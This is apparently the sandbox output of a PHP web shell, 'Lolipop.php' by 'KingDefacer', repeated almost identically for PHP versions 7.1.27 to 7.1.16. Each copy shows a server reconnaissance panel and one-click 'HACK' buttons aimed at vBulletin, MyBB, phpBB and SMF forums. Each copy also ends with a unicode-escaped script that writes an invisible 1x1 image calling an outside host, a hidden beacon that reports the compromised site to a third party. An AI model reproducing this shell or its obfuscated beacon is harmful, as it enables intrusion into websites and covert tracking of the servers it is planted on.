x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.27
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.27</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.26
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.26</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.1.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.1.16
